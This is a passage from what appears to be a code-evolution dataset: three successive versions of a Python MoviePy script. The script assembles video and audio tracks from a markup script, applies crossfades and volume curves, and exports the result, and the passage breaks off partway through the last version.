"step-3": "<mask token>\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n 
prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n 
vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if 
final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n print('vol_keypoints:', vol_keypoints)\n for p, vol in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception('unsupported bgm parameter type:' % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n return clip.fl(volume_adjust)\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\ndef _write_timestamp(t, section_name):\n os.makedirs(os.path.dirname(out_filename), exist_ok=True)\n if not hasattr(_write_timestamp, 'f'):\n _write_timestamp.f = open('%s.txt' % out_filename, 'w', encoding=\n 'utf-8')\n _write_timestamp.f.write('%s (%s)\\n' % (section_name,\n _convert_to_readable_time(t)))\n _write_timestamp.f.flush()\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n 
os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\n<mask token>\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as 
f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\n<mask token>\n",
"step-4": "<mask token>\nif 1:\n change_settings({'FFMPEG_BINARY': get_executable('ffmpeg')})\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if 
prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += 
crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if 
len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n print('vol_keypoints:', vol_keypoints)\n for p, vol in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception('unsupported bgm parameter type:' % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n return clip.fl(volume_adjust)\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\ndef _write_timestamp(t, section_name):\n os.makedirs(os.path.dirname(out_filename), exist_ok=True)\n if not hasattr(_write_timestamp, 'f'):\n _write_timestamp.f = open('%s.txt' % out_filename, 'w', encoding=\n 'utf-8')\n _write_timestamp.f.write('%s (%s)\\n' % (section_name,\n _convert_to_readable_time(t)))\n _write_timestamp.f.flush()\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = 
os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\ndef _show_stats(s):\n TIME_PER_CHAR = 0.1334154351395731\n total = 0\n\n def parse_line(line):\n 
nonlocal total\n total += len(line)\n _parse_text(s, apis={'parse_line': parse_line}, ignore_undefined=True)\n total_secs = TIME_PER_CHAR * total\n print('Estimated Time: %s' % format_time(total_secs))\n input()\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\nif __name__ == '__main__':\n out_filename = 'tmp/out/' + get_time_str()\n parser = argparse.ArgumentParser()\n parser.add_argument('--stdin', default=False, action='store_true')\n parser.add_argument('--proj_dir', type=str, default=None)\n parser.add_argument('-i', '--input', type=str, default=None)\n parser.add_argument('-a', '--audio_only', action='store_true', default=\n False)\n parser.add_argument('--remove_unused_recordings', action='store_true',\n default=False)\n parser.add_argument('--show_stats', action='store_true', default=False)\n parser.add_argument('--preview', action='store_true', default=False)\n args = parser.parse_args()\n if args.proj_dir is not None:\n os.chdir(args.proj_dir)\n elif args.input:\n os.chdir(os.path.dirname(args.input))\n print('Project dir: %s' % os.getcwd())\n if os.path.exists('api.py'):\n sys.path.append(os.getcwd())\n mymodule = importlib.import_module('api')\n global_functions = inspect.getmembers(mymodule, inspect.isfunction)\n core.apis.update({k: v for k, v in global_functions})\n if args.audio_only:\n coreapi.audio_only()\n if args.stdin:\n s = sys.stdin.read()\n elif args.input:\n with open(args.input, 'r', encoding='utf-8') as f:\n s = f.read()\n else:\n raise Exception('Either --stdin or --input should be specified.')\n load_config()\n if args.preview:\n coreapi.preview()\n if args.remove_unused_recordings:\n 
ignore_undefined = True\n _remove_unused_recordings(s)\n elif args.show_stats:\n ignore_undefined = True\n _show_stats(s)\n else:\n _parse_text(s, apis=core.apis)\n _export_video(resolution=(1920, 1080), audio_only=args.audio_only)\n",
"step-5": "import argparse\nimport glob\nimport importlib\nimport inspect\nimport math\nimport os\nimport re\nimport subprocess\nimport sys\n\nimport moviepy.audio.fx.all as afx\nimport moviepy.video.fx.all as vfx\nimport numpy as np\nfrom _appmanager import get_executable\nfrom _shutil import format_time, get_time_str, getch, print2\nfrom moviepy.config import change_settings\nfrom moviepy.editor import *\nfrom open_with.open_with import open_with\n\nimport codeapi\nimport core\nimport coreapi\nimport datastruct\n\nSCRIPT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\nignore_undefined = False\n\nif 1:\n change_settings({\"FFMPEG_BINARY\": get_executable(\"ffmpeg\")})\n\n\n# def _get_markers(file):\n# marker_file = file + \".marker.txt\"\n# if os.path.exists(marker_file):\n# with open(marker_file, \"r\") as f:\n# s = f.read()\n# return [float(x) for x in s.split()]\n# else:\n# return None\n\n\n# def _load_and_expand_img(f):\n# fg = Image.open(f).convert(\"RGBA\")\n# bg = Image.new(\"RGB\", (1920, 1080))\n# bg.paste(fg, ((bg.width - fg.width) // 2, (bg.height - fg.height) // 2), fg)\n# return np.array(bg)\n\n\ndef _update_mpy_clip(\n clip, subclip, speed, frame, norm, loop, duration, pos, scale, vol, **kwargs,\n):\n assert duration is not None\n\n # video clip operations / fx\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(\n duration - subclip_duration\n )\n clip = concatenate_videoclips([c1, c2])\n\n # HACK: workaround for a bug: 'CompositeAudioClip' object has no attribute 'fps'\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(duration)\n\n if speed is not None:\n clip = clip.fx(\n # pylint: 
disable=maybe-no-member\n vfx.speedx,\n speed,\n )\n\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n\n # Loop or change duration\n if loop:\n clip = clip.fx(\n # pylint: disable=maybe-no-member\n vfx.loop\n )\n\n if subclip is None:\n clip = clip.set_duration(duration)\n\n if pos is not None:\n # (x, y) marks the center location of the of the clip instead of the top\n # left corner.\n if pos == \"center\":\n clip = clip.set_position((\"center\", \"center\"))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [x // 2 for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n\n return clip\n\n\ndef _update_clip_duration(track):\n def is_connected(prev_clip, cur_clip):\n return math.isclose(\n prev_clip.start + prev_clip.duration, cur_clip.start, rel_tol=1e-3,\n )\n\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = clip_info.start - prev_clip_info.start\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n\n # Apply fadeout to previous clip if it's not connected with\n # current clip.\n if prev_clip_info.crossfade > 0 and not is_connected(\n prev_clip_info, clip_info\n ):\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n prev_clip_info = clip_info\n\n # Update last clip duration\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n\n # Extend the last video clip to match the voice track\n if \"re\" in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict[\"re\"] - clip_info.start)\n\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = 
False\n\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n\n audio_clips = []\n\n # Update clip duration for each track\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n\n # TODO: post-process video track clips\n\n # Update MoviePy clip object in each track.\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n\n # Unlink audio clip from video clip (adjust audio duration)\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n\n # Audio timing\n # TODO: audio subclip\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(\n clip_info.subclip[0], clip_info.subclip[1]\n )\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n\n # Adjust volume\n if clip_info.norm:\n audio_clip = audio_clip.fx(\n # pylint: disable=maybe-no-member\n afx.audio_normalize\n )\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(\n # pylint: disable=maybe-no-member\n afx.volumex,\n clip_info.vol,\n )\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(\n audio_clip, clip_info.vol\n )\n\n audio_clips.append(audio_clip)\n\n # If the next clip has crossfade enabled\n crossfade_duration = track[i + 1].crossfade if (i < len(track) - 1) else 0\n if crossfade_duration:\n # clip_info.fadeout = crossfade_duration # Fadeout current clip\n 
clip_info.duration += crossfade_duration\n\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **vars(clip_info))\n\n # Deal with video fade in / out / crossfade\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n # TODO: crossfadein and crossfadeout is very slow in moviepy\n if track_name != \"vid\":\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein\n )\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(\n # pylint: disable=maybe-no-member\n vfx.fadein,\n clip_info.fadein,\n )\n\n elif (\n clip_info.crossfade > 0\n ): # crossfade and fadein should not happen at the same time\n video_clips.append(\n clip_info.mpy_clip.set_duration(clip_info.crossfade)\n .crossfadein(clip_info.crossfade)\n .set_start(clip_info.start)\n )\n\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.crossfade)\n clip_info.start += clip_info.crossfade\n\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != \"vid\":\n # pylint: disable=maybe-no-member\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout\n )\n else:\n\n clip_info.mpy_clip = clip_info.mpy_clip.fx(\n # pylint: disable=maybe-no-member\n vfx.fadeout,\n clip_info.fadeout,\n )\n\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).set_duration(2))\n # raise Exception(\"no video clips??\")\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n\n # Resize here is too late, does not speed up the video encoding at all.\n # final_clip = final_clip.resize(width=480)\n\n # Deal with audio clips\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n # HACK: reload the clip.\n #\n # still don't know why using loaded mpy_clip directly will cause\n # \"IndexError: index -200001 is out of bounds for axis 0 with\n # size 0\"...\n clip = 
